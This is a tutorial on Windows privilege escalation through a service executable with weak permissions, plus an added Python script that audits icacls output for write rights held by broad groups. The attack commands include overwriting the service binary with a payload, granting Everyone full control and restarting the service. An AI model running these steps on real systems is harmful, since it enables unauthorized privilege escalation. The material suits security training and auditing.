
Insecure Permissions

If the executable associated with a Service has Weak Permissions that allow an Attacker to Modify or Replace it, the Attacker can gain the Privileges of the Service Account.

Analyzing the Service

In this case the VulnerableService Service has Weak Permissions that allow its Executable to be Modified or Replaced, so it is possible to gain the Privileges of the Service.

:: Query Service Information
sc qc "VulnerableService"


Now we can proceed to check the Permissions on the Executable. We can see that the Group Everyone has Modify Permissions (M) on the Service Executable. This means we can Overwrite it with any Payload of our preference, and the Service will execute it with the Privileges of the configured User Account.

:: Show Executable Permissions
icacls C:\Service\Path\VulnService.exe
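
The same icacls output can be checked automatically when auditing a host. The following Python code is an added example, not part of the original page: it parses icacls output and reports write-capable entries held by broad groups. The sample output, the principal watch list and the name `weak_aces` are constructed for illustration.

```python
import re

# Broad principals that include unprivileged users (assumed watch list; extend as needed).
BROAD = {"everyone", "builtin\\users", "nt authority\\authenticated users",
         "nt authority\\interactive"}
# icacls rights that let a principal change the file or its ACL/owner.
WRITE = {"F", "M", "W", "WD", "AD", "GA", "GW", "WDAC", "WO"}
# Parenthesised tokens that are inheritance/type markers, not rights.
FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")

def weak_aces(icacls_output, path):
    """Return [(principal, [write rights])] for broad principals in icacls output."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first line is prefixed with the path
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        tokens = [t.upper() for t in re.findall(r"\(([^)]*)\)", m["groups"])]
        flags = {t for t in tokens if t in FLAGS}
        rights = {r.strip() for t in tokens if t not in FLAGS for r in t.split(",")}
        if flags & {"DENY", "IO"}:
            continue  # deny entries and inherit-only entries grant nothing on this file
        risky = sorted(rights & WRITE)
        if m["who"].lower() in BROAD and risky:
            findings.append((m["who"], risky))
    return findings

# Constructed sample output, modelled on the finding described above.
SAMPLE_PATH = r"C:\Service\Path\VulnService.exe"
SAMPLE = r"""C:\Service\Path\VulnService.exe Everyone:(I)(M)
                                NT AUTHORITY\SYSTEM:(I)(F)
                                BUILTIN\Administrators:(I)(F)
                                NT AUTHORITY\Authenticated Users:(RX,W)
                                BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for who, rights in weak_aces(SAMPLE, SAMPLE_PATH):
        print(f"{SAMPLE_PATH}: {who} holds {','.join(rights)}")
```

Any finding means the ACL on the Service Executable should be tightened so that only administrators and SYSTEM can write to it.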


Replacing the Service

Note

If we need another User to execute the PAYLOAD, we need to grant the Correct Permissions to the Service Executable. In this case we grant Full Permission (F) to the Everyone Group: Everyone:(F)

:: Replace the Vulnerable Service Executable with a PAYLOAD of your Preference
move C:\Payload\Path\Payload.exe C:\Service\Path\VulnService.exe

:: Assign new Permissions
icacls C:\Service\Path\VulnService.exe /grant Everyone:F

Restarting the Service

Note

In a Normal Scenario, if we don't have the Required Permissions to Restart the Service, we would likely have to wait for the Service to Restart.

In case we have the Required Permissions to Restart the Service, we can use the sc command.

sc stop  "VulnerableService"
sc start "VulnerableService"